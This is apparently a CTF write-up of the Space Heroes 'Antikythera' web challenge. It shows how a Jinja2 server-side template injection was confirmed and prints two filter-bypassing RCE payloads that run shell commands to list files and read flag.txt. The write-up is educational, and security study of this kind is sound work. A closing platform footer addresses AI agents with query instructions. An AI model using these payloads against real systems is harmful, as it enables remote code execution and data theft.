# Web - Antikythera

## Description

Lost in the labyrinthine calculations of planetary motion, I stumbled upon an anomaly. Ancient Greek symbols, not our modern equations, whispered of celestial mechanics. Driven by a scientist's curiosity, I cracked their cryptic code. The unearthed knowledge, a testament to their forgotten ingenuity, fueled the creation of the "Greek Astronomical Calculator." This isn't just a tool for prediction; it's a portal to a bygone era's uncanny understanding of the cosmos.

## Solution

Unfortunately, I don't have any images to show because the challenge is not up anymore. But basically, the challenge has an input field that is vulnerable to SSTI. This is confirmed by trying the typical SSTI input `{{7*7}}` and checking that the server evaluates the input to `49`.

Looking at [HackTricks](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jinja2-python) and trying out a few other payloads, the server appears to be running Jinja2 (Python).&#x20;

Thankfully, HackTricks have a page dedicated to Jinja2 SSTI including payloads that bypasses typical filters.&#x20;

<figure><img src="/files/ESJlp30gdiiKds3kgSpq" alt=""><figcaption><p>HackTricks</p></figcaption></figure>

If we scroll down the page, we find a payload that seems to avoid most filters [here](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti#without-several-chars).

```python
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
```

The payload above is an RCE payload that executes the `ls -l` command. Running it, the `flag.txt` file can be found in the directory.

Finally, we run the `cat flag.txt` payload to read the flag:

```python
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat${IFS}flag.txt')|attr('read')()%}{%print(a)%}{%endwith%}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://arne-ctf.gitbook.io/ctf/2024/space-heroes-ctf/web-antikythera.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.